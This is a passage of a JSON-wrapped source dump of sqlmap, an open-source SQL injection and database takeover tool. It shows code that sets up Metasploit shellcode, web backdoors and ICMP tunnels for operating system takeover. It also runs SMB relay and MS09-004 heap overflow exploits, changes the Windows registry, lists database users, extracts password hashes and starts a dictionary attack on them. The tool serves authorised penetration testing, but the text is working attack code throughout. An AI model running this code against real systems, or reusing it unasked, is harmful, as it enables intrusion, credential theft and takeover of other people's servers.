raise SqlmapFilePathException(msg)\n\n                if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:\n                    debugMsg = \"by default MySQL on Windows runs as SYSTEM \"\n                    debugMsg += \"user, no need to privilege escalate\"\n                    logger.debug(debugMsg)\n\n            elif tunnel == 2:\n                setupSuccess = self.uploadIcmpshSlave(web=web)\n\n                if setupSuccess is not True:\n                    if Backend.isDbms(DBMS.MYSQL):\n                        fallbackToWeb = True\n                    else:\n                        msg = \"unable to mount the operating system takeover\"\n                        raise SqlmapFilePathException(msg)\n\n        if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):\n            web = True\n\n            if fallbackToWeb:\n                infoMsg = \"falling back to web backdoor to establish the tunnel\"\n            else:\n                infoMsg = \"going to use a web backdoor to establish the tunnel\"\n            logger.info(infoMsg)\n\n            self.initEnv(web=web, forceInit=fallbackToWeb)\n\n            if self.webBackdoorUrl:\n                if not Backend.isOs(OS.WINDOWS) and conf.privEsc:\n                    # Unset --priv-esc if the back-end DBMS underlying operating\n                    # system is not Windows\n                    conf.privEsc = False\n\n                    warnMsg = \"sqlmap does not implement any operating system \"\n                    warnMsg += \"user privilege escalation technique when the \"\n                    warnMsg += \"back-end DBMS underlying system is not Windows\"\n                    logger.warning(warnMsg)\n\n                if tunnel == 1:\n                    self.createMsfShellcode(exitfunc=\"process\", format=\"raw\", extra=\"BufferRegister=EAX\", encode=\"x86/alpha_mixed\")\n                    setupSuccess = self.uploadShellcodeexec(web=web)\n\n                    if setupSuccess is not True:\n                        msg = \"unable to mount the operating system takeover\"\n                        raise SqlmapFilePathException(msg)\n\n                elif tunnel == 2:\n                    setupSuccess = self.uploadIcmpshSlave(web=web)\n\n                    if setupSuccess is not True:\n                        msg = \"unable to mount the operating system takeover\"\n                        raise SqlmapFilePathException(msg)\n\n        if setupSuccess:\n            if tunnel == 1:\n                self.pwn(goUdf)\n            elif tunnel == 2:\n                self.icmpPwn()\n        else:\n            errMsg = \"unable to prompt for an out-of-band session\"\n            raise SqlmapNotVulnerableException(errMsg)\n\n        if not conf.cleanup:\n            self.cleanup(web=web)\n\n    def osSmb(self):\n        self.checkDbmsOs()\n\n        if not Backend.isOs(OS.WINDOWS):\n            errMsg = \"the back-end DBMS underlying operating system is \"\n            errMsg += \"not Windows: it is not possible to perform the SMB \"\n            errMsg += \"relay attack\"\n            raise SqlmapUnsupportedDBMSException(errMsg)\n\n        if not isStackingAvailable() and not conf.direct:\n            if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):\n                errMsg = \"on this back-end DBMS it is only possible to \"\n                errMsg += \"perform the SMB relay attack if stacked \"\n                errMsg += \"queries are supported\"\n                raise SqlmapUnsupportedDBMSException(errMsg)\n\n            elif Backend.isDbms(DBMS.MYSQL):\n                debugMsg = \"since stacked queries are not supported, \"\n                debugMsg += \"sqlmap is going to perform the SMB relay \"\n                debugMsg += \"attack via inference blind SQL injection\"\n                logger.debug(debugMsg)\n\n        printWarn = True\n        warnMsg = \"it is unlikely that this attack will be successful \"\n\n        if Backend.isDbms(DBMS.MYSQL):\n            warnMsg += \"because by default MySQL on Windows runs as \"\n            warnMsg += \"Local System which is not a real user, it does \"\n            warnMsg += \"not send the NTLM session hash when connecting to \"\n            warnMsg += \"a SMB service\"\n\n        elif Backend.isDbms(DBMS.PGSQL):\n            warnMsg += \"because by default PostgreSQL on Windows runs \"\n            warnMsg += \"as postgres user which is a real user of the \"\n            warnMsg += \"system, but not within the Administrators group\"\n\n        elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")):\n            warnMsg += \"because often Microsoft SQL Server %s \" % Backend.getVersion()\n            warnMsg += \"runs as Network Service which is not a real user, \"\n            warnMsg += \"it does not send the NTLM session hash when \"\n            warnMsg += \"connecting to a SMB service\"\n\n        else:\n            printWarn = False\n\n        if printWarn:\n            logger.warning(warnMsg)\n\n        self.smb()\n\n    def osBof(self):\n        if not isStackingAvailable() and not conf.direct:\n            return\n\n        if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin((\"2000\", \"2005\")):\n            errMsg = \"the back-end DBMS must be Microsoft SQL Server \"\n            errMsg += \"2000 or 2005 to be able to exploit the heap-based \"\n            errMsg += \"buffer overflow in the 'sp_replwritetovarbin' \"\n            errMsg += \"stored procedure (MS09-004)\"\n            raise SqlmapUnsupportedDBMSException(errMsg)\n\n        infoMsg = \"going to exploit the Microsoft SQL Server %s \" % Backend.getVersion()\n        infoMsg += \"'sp_replwritetovarbin' stored procedure heap-based \"\n        infoMsg += \"buffer overflow (MS09-004)\"\n        logger.info(infoMsg)\n\n        msg = \"this technique is likely to DoS the DBMS process, are you \"\n        msg += \"sure that you want to carry with the exploit? [y/N] \"\n\n        if readInput(msg, default='N', boolean=True):\n            self.initEnv(mandatory=False, detailed=True)\n            self.getRemoteTempPath()\n            self.createMsfShellcode(exitfunc=\"seh\", format=\"raw\", extra=\"-b 27\", encode=True)\n            self.bof()\n\n    def uncPathRequest(self):\n        errMsg = \"'uncPathRequest' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def _regInit(self):\n        if not isStackingAvailable() and not conf.direct:\n            return\n\n        self.checkDbmsOs()\n\n        if not Backend.isOs(OS.WINDOWS):\n            errMsg = \"the back-end DBMS underlying operating system is \"\n            errMsg += \"not Windows\"\n            raise SqlmapUnsupportedDBMSException(errMsg)\n\n        self.initEnv()\n        self.getRemoteTempPath()\n\n    def regRead(self):\n        self._regInit()\n\n        if not conf.regKey:\n            default = \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\"\n            msg = \"which registry key do you want to read? [%s] \" % default\n            regKey = readInput(msg, default=default)\n        else:\n            regKey = conf.regKey\n\n        if not conf.regVal:\n            default = \"ProductName\"\n            msg = \"which registry key value do you want to read? [%s] \" % default\n            regVal = readInput(msg, default=default)\n        else:\n            regVal = conf.regVal\n\n        infoMsg = \"reading Windows registry path '%s\\\\%s' \" % (regKey, regVal)\n        logger.info(infoMsg)\n\n        return self.readRegKey(regKey, regVal, True)\n\n    def regAdd(self):\n        self._regInit()\n\n        errMsg = \"missing mandatory option\"\n\n        if not conf.regKey:\n            msg = \"which registry key do you want to write? \"\n            regKey = readInput(msg)\n\n            if not regKey:\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n        else:\n            regKey = conf.regKey\n\n        if not conf.regVal:\n            msg = \"which registry key value do you want to write? \"\n            regVal = readInput(msg)\n\n            if not regVal:\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n        else:\n            regVal = conf.regVal\n\n        if not conf.regData:\n            msg = \"which registry key value data do you want to write? \"\n            regData = readInput(msg)\n\n            if not regData:\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n        else:\n            regData = conf.regData\n\n        if not conf.regType:\n            default = \"REG_SZ\"\n            msg = \"which registry key value data-type is it? \"\n            msg += \"[%s] \" % default\n            regType = readInput(msg, default=default)\n        else:\n            regType = conf.regType\n\n        infoMsg = \"adding Windows registry path '%s\\\\%s' \" % (regKey, regVal)\n        infoMsg += \"with data '%s'. \" % regData\n        infoMsg += \"This will work only if the user running the database \"\n        infoMsg += \"process has privileges to modify the Windows registry.\"\n        logger.info(infoMsg)\n\n        self.addRegKey(regKey, regVal, regType, regData)\n\n    def regDel(self):\n        self._regInit()\n\n        errMsg = \"missing mandatory option\"\n\n        if not conf.regKey:\n            msg = \"which registry key do you want to delete? \"\n            regKey = readInput(msg)\n\n            if not regKey:\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n        else:\n            regKey = conf.regKey\n\n        if not conf.regVal:\n            msg = \"which registry key value do you want to delete? \"\n            regVal = readInput(msg)\n\n            if not regVal:\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n        else:\n            regVal = conf.regVal\n\n        message = \"are you sure that you want to delete the Windows \"\n        message += \"registry path '%s\\\\%s? [y/N] \" % (regKey, regVal)\n\n        if not readInput(message, default='N', boolean=True):\n            return\n\n        infoMsg = \"deleting Windows registry path '%s\\\\%s'. \" % (regKey, regVal)\n        infoMsg += \"This will work only if the user running the database \"\n        infoMsg += \"process has privileges to modify the Windows registry.\"\n        logger.info(infoMsg)\n\n        self.delRegKey(regKey, regVal)\n"
  },
  {
    "path": "sqlmap/plugins/generic/users.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import Backend\nfrom lib.core.common import filterPairValues\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isAdminFromPrivileges\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNullValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import parsePasswordHash\nfrom lib.core.common import readInput\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeHex\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.dicts import DB2_PRIVS\nfrom lib.core.dicts import FIREBIRD_PRIVS\nfrom lib.core.dicts import INFORMIX_PRIVS\nfrom lib.core.dicts import MYSQL_PRIVS\nfrom lib.core.dicts import PGSQL_PRIVS\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import FORK\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import CURRENT_USER\nfrom lib.core.settings import PLUS_ONE_DBMSES\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.request import inject\nfrom lib.utils.hash import attackCachedUsersPasswords\nfrom lib.utils.hash import storeHashesToFile\nfrom lib.utils.pivotdumptable import pivotDumpTable\nfrom thirdparty.six.moves import zip as _zip\n\nclass Users(object):\n    \"\"\"\n    This class defines users' enumeration functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        kb.data.currentUser = \"\"\n        kb.data.isDba = None\n        kb.data.cachedUsers = []\n        kb.data.cachedUsersPasswords = {}\n        kb.data.cachedUsersPrivileges = {}\n        kb.data.cachedUsersRoles = {}\n\n    def getCurrentUser(self):\n        infoMsg = \"fetching current user\"\n        logger.info(infoMsg)\n\n        query = queries[Backend.getIdentifiedDbms()].current_user.query\n\n        if not kb.data.currentUser:\n            kb.data.currentUser = unArrayizeValue(inject.getValue(query))\n\n        return kb.data.currentUser\n\n    def isDba(self, user=None):\n        infoMsg = \"testing if current user is DBA\"\n        logger.info(infoMsg)\n\n        query = None\n\n        if Backend.isDbms(DBMS.MYSQL):\n            self.getCurrentUser()\n            if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                kb.data.isDba = \"root\" in (kb.data.currentUser or \"\")\n            elif kb.data.currentUser:\n                query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split(\"@\")[0]\n        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:\n            query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user\n        else:\n            query = queries[Backend.getIdentifiedDbms()].is_dba.query\n\n        if query:\n            query = agent.forgeCaseStatement(query)\n            kb.data.isDba = inject.checkBooleanExpression(query) or False\n\n        return kb.data.isDba\n\n    def getUsers(self):\n        infoMsg = \"fetching database users\"\n        logger.info(infoMsg)\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].users\n\n        condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")))\n        condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema)\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                query = rootQuery.inband.query3\n            elif condition:\n                query = rootQuery.inband.query2\n            else:\n                query = rootQuery.inband.query\n\n            values = inject.getValue(query, blind=False, time=False)\n\n            if not isNoneValue(values):\n                kb.data.cachedUsers = []\n                for value in arrayizeValue(values):\n                    value = unArrayizeValue(value)\n                    if not isNoneValue(value):\n                        kb.data.cachedUsers.append(value)\n\n        if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:\n            infoMsg = \"fetching number of database users\"\n            logger.info(infoMsg)\n\n            if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                query = rootQuery.blind.count3\n            elif condition:\n                query = rootQuery.blind.count2\n            else:\n                query = rootQuery.blind.count\n\n            count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n            if count == 0:\n                return kb.data.cachedUsers\n            elif not isNumPosStrValue(count):\n                errMsg = \"unable to retrieve the number of database users\"\n                raise SqlmapNoneDataException(errMsg)\n\n            plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n            indexRange = getLimitRange(count, plusOne=plusOne)\n\n            for index in indexRange:\n                if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):\n                    query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else \" \")\n                elif Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                    query = rootQuery.blind.query3 % index\n                elif condition:\n                    query = rootQuery.blind.query2 % index\n                else:\n                    query = rootQuery.blind.query % index\n\n                user = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                if user:\n                    kb.data.cachedUsers.append(user)\n\n        if not kb.data.cachedUsers:\n            errMsg = \"unable to retrieve the database users\"\n            logger.error(errMsg)\n\n        return kb.data.cachedUsers\n\n    def getPasswordHashes(self):\n        infoMsg = \"fetching database users password hashes\"\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].passwords\n\n        if conf.user == CURRENT_USER:\n            infoMsg += \" for current user\"\n            conf.user = self.getCurrentUser()\n\n        logger.info(infoMsg)\n\n        if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):\n            conf.user = conf.user.upper()\n\n        if conf.user:\n            users = conf.user.split(',')\n\n            if Backend.isDbms(DBMS.MYSQL):\n                for user in users:\n                    parsedUser = re.search(r\"['\\\"]?(.*?)['\\\"]?\\@\", user)\n\n                    if parsedUser:\n                        users[users.index(user)] = parsedUser.groups()[0]\n        else:\n            users = []\n\n        users = [_ for _ in users if _]\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")):\n                query = rootQuery.inband.query2\n            else:\n                query = rootQuery.inband.query\n\n            condition = rootQuery.inband.condition\n\n            if conf.user:\n                query += \" WHERE \"\n                query += \" OR \".join(\"%s = '%s'\" % (condition, user) for user in sorted(users))\n\n            if Backend.isDbms(DBMS.SYBASE):\n                getCurrentThreadData().disableStdOut = True\n\n                retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False)\n\n                if retVal:\n                    for user, password in filterPairValues(_zip(retVal[0][\"%s.name\" % kb.aliasName], retVal[0][\"%s.password\" % kb.aliasName])):\n                        if user not in kb.data.cachedUsersPasswords:\n                            kb.data.cachedUsersPasswords[user] = [password]\n                        else:\n                            kb.data.cachedUsersPasswords[user].append(password)\n\n                getCurrentThreadData().disableStdOut = False\n            else:\n                values = inject.getValue(query, blind=False, time=False)\n\n                if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):\n                    values = inject.getValue(query.replace(\"master.dbo.fn_varbintohexstr\", \"sys.fn_sqlvarbasetostr\"), blind=False, time=False)\n                elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)):\n                    values = inject.getValue(query.replace(\"authentication_string\", \"password\"), blind=False, time=False)\n\n                for user, password in filterPairValues(values):\n                    if not user or user == \" \":\n                        continue\n\n                    password = parsePasswordHash(password)\n\n                    if user not in kb.data.cachedUsersPasswords:\n                        kb.data.cachedUsersPasswords[user] = [password]\n                    else:\n                        kb.data.cachedUsersPasswords[user].append(password)\n\n        if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct:\n            fallback = False\n\n            if not len(users):\n                users = self.getUsers()\n\n                if Backend.isDbms(DBMS.MYSQL):\n                    for user in users:\n                        parsedUser = re.search(r\"['\\\"]?(.*?)['\\\"]?\\@\", user)\n\n                        if parsedUser:\n                            users[users.index(user)] = parsedUser.groups()[0]\n\n            if Backend.isDbms(DBMS.SYBASE):\n                getCurrentThreadData().disableStdOut = True\n\n                query = rootQuery.inband.query\n\n                retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True)\n\n                if retVal:\n                    for user, password in filterPairValues(_zip(retVal[0][\"%s.name\" % kb.aliasName], retVal[0][\"%s.password\" % kb.aliasName])):\n                        password = \"0x%s\" % encodeHex(password, binary=False).upper()\n\n                        if user not in kb.data.cachedUsersPasswords:\n                            kb.data.cachedUsersPasswords[user] = [password]\n                        else:\n                            kb.data.cachedUsersPasswords[user].append(password)\n\n                getCurrentThreadData().disableStdOut = False\n            else:\n                retrievedUsers = set()\n\n                for user in users:\n                    user = unArrayizeValue(user)\n\n                    if user in retrievedUsers:\n                        continue\n\n                    if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):\n                        count = 1\n                    else:\n                        infoMsg = \"fetching number of password hashes \"\n                        infoMsg += \"for user '%s'\" % user\n                        logger.info(infoMsg)\n\n                        if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")):\n                            query = rootQuery.blind.count2 % user\n                        else:\n                            query = rootQuery.blind.count % user\n\n                        count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                        if not isNumPosStrValue(count):\n                            if Backend.isDbms(DBMS.MSSQL):\n                                fallback = True\n                                count = inject.getValue(query.replace(\"master.dbo.fn_varbintohexstr\", \"sys.fn_sqlvarbasetostr\"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n                            elif Backend.isDbms(DBMS.MYSQL):\n                                fallback = True\n                                count = inject.getValue(query.replace(\"authentication_string\", \"password\"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                        if not isNumPosStrValue(count):\n                            warnMsg = \"unable to retrieve the number of password \"\n                            warnMsg += \"hashes for user '%s'\" % user\n                            logger.warning(warnMsg)\n                            continue\n\n                    infoMsg = \"fetching password hashes for user '%s'\" % user\n                    logger.info(infoMsg)\n\n                    passwords = []\n\n                    plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n                    indexRange = getLimitRange(count, plusOne=plusOne)\n\n                    for index in indexRange:\n                        if Backend.isDbms(DBMS.MSSQL):\n                            if Backend.isVersionWithin((\"2005\", \"2008\")):\n                                query = rootQuery.blind.query2 % (user, index, user)\n                            else:\n                                query = rootQuery.blind.query % (user, index, user)\n\n                            if fallback:\n                                query = query.replace(\"master.dbo.fn_varbintohexstr\", \"sys.fn_sqlvarbasetostr\")\n\n                        elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):\n                            query = rootQuery.blind.query % (user,)\n\n                        elif Backend.isDbms(DBMS.HSQLDB):\n                            query = rootQuery.blind.query % (index, user)\n\n                        else:\n                            query = rootQuery.blind.query % (user, index)\n\n                        if Backend.isDbms(DBMS.MYSQL):\n                            if fallback:\n                                query = query.replace(\"authentication_string\", \"password\")\n\n                        password = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                        password = parsePasswordHash(password)\n\n                        passwords.append(password)\n\n                    if passwords:\n                        kb.data.cachedUsersPasswords[user] = passwords\n                    else:\n                        warnMsg = \"unable to retrieve the password \"\n                        warnMsg += \"hashes for user '%s'\" % user\n                        logger.warning(warnMsg)\n\n                    retrievedUsers.add(user)\n\n        if not kb.data.cachedUsersPasswords:\n            errMsg = \"unable to retrieve the password hashes for the \"\n            errMsg += \"database users\"\n            logger.error(errMsg)\n        else:\n            for user in kb.data.cachedUsersPasswords:\n                kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user]))\n\n            storeHashesToFile(kb.data.cachedUsersPasswords)\n\n            message = \"do you want to perform a dictionary-based attack \"\n            message += \"against retrieved password hashes? [Y/n/q]\"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'N':\n                pass\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                attackCachedUsersPasswords()\n\n        return kb.data.cachedUsersPasswords\n\n    def getPrivileges(self, query2=False):\n        infoMsg = \"fetching database users privileges\"\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].privileges\n\n        if conf.user == CURRENT_USER:\n            infoMsg += \" for current user\"\n            conf.user = self.getCurrentUser()\n\n        logger.info(infoMsg)\n\n        if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):\n            conf.user = conf.user.upper()\n\n        if conf.user:\n            users = conf.user.split(',')\n\n            if Backend.isDbms(DBMS.MYSQL):\n                for user in users:\n                    parsedUser = re.search(r\"['\\\"]?(.*?)['\\\"]?\\@\", user)\n\n                    if parsedUser:\n                        users[users.index(user)] = parsedUser.groups()[0]\n        else:\n            users = []\n\n        users = [_ for _ in users if _]\n\n        # Set containing the list of DBMS administrators\n        areAdmins = set()\n\n        if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                query = rootQuery.inband.query2\n                condition = rootQuery.inband.condition2\n            elif Backend.isDbms(DBMS.ORACLE) and query2:\n                query = rootQuery.inband.query2\n                condition = rootQuery.inband.condition2\n            else:\n                query = rootQuery.inband.query\n                condition = rootQuery.inband.condition\n\n            if conf.user:\n                query += \" WHERE \"\n\n                if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:\n                    query += \" OR \".join(\"%s LIKE '%%%s%%'\" % (condition, user) for user in sorted(users))\n                else:\n                    query += \" OR \".join(\"%s = '%s'\" % (condition, user) for user in sorted(users))\n\n            values = inject.getValue(query, blind=False, time=False)\n\n            if not values and Backend.isDbms(DBMS.ORACLE) and not query2:\n                infoMsg = \"trying with table 'USER_SYS_PRIVS'\"\n                logger.info(infoMsg)\n\n                return self.getPrivileges(query2=True)\n\n            if not isNoneValue(values):\n                for value in values:\n                    user = None\n                    privileges = set()\n\n                    for count in xrange(0, len(value or [])):\n                        # The first column is always the username\n                        if count == 0:\n                            user = value[count]\n\n                        # The other columns are the privileges\n                        else:\n                            privilege = value[count]\n\n                            if privilege is None:\n                                continue\n\n                            # In PostgreSQL we get 1 if the privilege is\n                            # True, 0 otherwise\n                            if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():\n                                if int(privilege) == 1 and count in PGSQL_PRIVS:\n                                    privileges.add(PGSQL_PRIVS[count])\n\n                            # In MySQL >= 5.0 and Oracle we get the list\n                            # of privileges as string\n                            elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):\n                                privileges.add(privilege)\n\n                            # In MySQL < 5.0 we get Y if the privilege is\n                            # True, N otherwise\n                            elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                                if privilege.upper() == 'Y':\n                                    privileges.add(MYSQL_PRIVS[count])\n\n                            # In Firebird we get one letter for each privilege\n                            elif Backend.isDbms(DBMS.FIREBIRD):\n                                if privilege.strip() in FIREBIRD_PRIVS:\n                                    privileges.add(FIREBIRD_PRIVS[privilege.strip()])\n\n                            # In DB2 we get Y or G if the privilege is\n                            # True, N otherwise\n                            elif Backend.isDbms(DBMS.DB2):\n                                privs = privilege.split(',')\n                                privilege = privs[0]\n                                if len(privs) > 1:\n                                    privs = privs[1]\n                                    privs = list(privs.strip())\n                                    i = 1\n\n                                    for priv in privs:\n                                        if priv.upper() in ('Y', 'G'):\n                                            for position, db2Priv in DB2_PRIVS.items():\n                                                if position == i:\n                                                    privilege += \", \" + db2Priv\n\n                                        i += 1\n\n                                privileges.add(privilege)\n\n                    if user in kb.data.cachedUsersPrivileges:\n                        kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user]))\n                    else:\n                        kb.data.cachedUsersPrivileges[user] = list(privileges)\n\n        if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct:\n            if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:\n                conditionChar = \"LIKE\"\n            else:\n                conditionChar = \"=\"\n\n            if not len(users):\n                users = self.getUsers()\n\n                if Backend.isDbms(DBMS.MYSQL):\n                    for user in users:\n                        parsedUser = re.search(r\"['\\\"]?(.*?)['\\\"]?\\@\", user)\n\n                        if parsedUser:\n                            users[users.index(user)] = parsedUser.groups()[0]\n\n            retrievedUsers = set()\n\n            for user in users:\n                outuser = user\n                if user in retrievedUsers:\n                    continue\n\n                if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:\n                    user = \"%%%s%%\" % user\n\n                if Backend.isDbms(DBMS.INFORMIX):\n                    count = 1\n                else:\n                    infoMsg = \"fetching number of privileges \"\n                    infoMsg += \"for user '%s'\" % outuser\n                    logger.info(infoMsg)\n\n                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        query = rootQuery.blind.count2 % user\n                    elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:\n                        query = rootQuery.blind.count % (conditionChar, user)\n                    elif Backend.isDbms(DBMS.ORACLE) and query2:\n                        query = rootQuery.blind.count2 % user\n                    else:\n                        query = rootQuery.blind.count % user\n\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:\n                            infoMsg = \"trying with table 'USER_SYS_PRIVS'\"\n                            logger.info(infoMsg)\n\n                            return self.getPrivileges(query2=True)\n\n                        warnMsg = \"unable to retrieve the number of \"\n                        warnMsg += \"privileges for user '%s'\" % outuser\n                        logger.warning(warnMsg)\n                        continue\n\n                infoMsg = \"fetching privileges for user '%s'\" % outuser\n                logger.info(infoMsg)\n\n                privileges = set()\n\n                plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n                indexRange = getLimitRange(count, plusOne=plusOne)\n\n                for index in indexRange:\n                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        query = rootQuery.blind.query2 % (user, index)\n                    elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:\n                        query = rootQuery.blind.query % (conditionChar, user, index)\n                    elif Backend.isDbms(DBMS.ORACLE) and query2:\n                        query = rootQuery.blind.query2 % (user, index)\n                    elif Backend.isDbms(DBMS.FIREBIRD):\n                        query = rootQuery.blind.query % (index, user)\n                    elif Backend.isDbms(DBMS.INFORMIX):\n                        query = rootQuery.blind.query % (user,)\n                    else:\n                        query = rootQuery.blind.query % (user, index)\n\n                    privilege = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                    if privilege is None:\n                        continue\n\n                    # In PostgreSQL we get 1 if the privilege is True,\n                    # 0 otherwise\n                    if Backend.isDbms(DBMS.PGSQL) and \", \" in privilege:\n                        privilege = privilege.replace(\", \", ',')\n                        privs = privilege.split(',')\n                        i = 1\n\n                        for priv in privs:\n                            if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS:\n                                privileges.add(PGSQL_PRIVS[i])\n\n                            i += 1\n\n                    # In MySQL >= 5.0 and Oracle we get the list\n                    # of privileges as string\n                    elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):\n                        privileges.add(privilege)\n\n                    # In MySQL < 5.0 we get Y if the privilege is\n                    # True, N otherwise\n                    elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        privilege = privilege.replace(\", \", ',')\n                        privs = privilege.split(',')\n                        i = 1\n\n                        for priv in privs:\n                            if priv.upper() == 'Y':\n                                for position, mysqlPriv in MYSQL_PRIVS.items():\n                                    if position == i:\n                                        privileges.add(mysqlPriv)\n\n                            i += 1\n\n                    # In Firebird we get one letter for each privilege\n                    elif Backend.isDbms(DBMS.FIREBIRD):\n                        if privilege.strip() in FIREBIRD_PRIVS:\n                            